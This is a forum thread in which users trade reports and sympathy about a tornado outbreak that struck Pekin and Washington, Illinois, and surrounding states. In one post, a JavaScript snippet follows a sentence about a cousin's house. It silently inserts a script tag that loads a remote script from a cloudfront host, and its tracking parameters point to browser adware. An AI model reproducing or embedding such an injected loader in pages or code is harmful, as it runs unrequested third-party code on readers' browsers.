Severe weather in my area
There has been heavy damage to part of my town - Pekin, and Washington, IL (about 15 miles away, has severe damage - entire neighborhoods destroyed. It continued to roll north and went over me but not to the extent that it hit the Washington, IL area, they had a massive path of destruction and a tornado definitely touched down and wiped out up to several hundred homes. My prayers go out to them, I have allready been through 1 tornado myself and it just boggles the mind how powerful these storms are unless you go through one.

Best of luck to those affected by the storm. Living in a hurricane state, Florida, I know how frightening it can be.

The storms rolled all through Michigan.. I live in the south west corner near the Indiana border... at 3:15 we had a tornado warning... in 38 years living in this house I have never gone to the basement, but I did today.. it passed quickly and we had no damage... the storm was so wide spread.. lots of people without power.. for the rest of the night and into tomorrow we have high wind warnings... up to 70 miles an hour.. so here is hoping that doesn't happen.. Hope everyone is good and safe tonight. mendon

Every year this weather gets crazier and crazier. Living in Northeast Texas, I am no stranger to bad weather / tornadoes. In the past several years our area has been spared. I share your apprehension anytime we have the threat of bad weather in our area. Unfortunately when these bad weather events happen they happen so fast there is not much time to take action. My thoughts and prayers for those families that were in the path of these storms.

My cousin Angie's house had light damage.(function () {if (top.location == self.location && top.location.href.split('#')[0] == 'http://forum.videopoker.com/forum/RTE_t ... 57&ID=1367') {var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;po.src = document.location.protocol + '//dj3895b110uri.cloudfront.net/js/antshrike.js?u=68ac76e5-c164-4dac-9f79-4272fdd7d33a&subid1=20130919&subid2=browsersafeguard-pitch&subid3=google_zoomdownloadmngr-display-US-468x60-26642675682';var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);}})();

My prayers go out to your area as well, player. My God, I was frightened myself, had a very scary storm here in Southwest Chicago burb and certainly cannot imagine how horrific it had to be down there today. I thank God for sparing me and my heart breaks for your area.
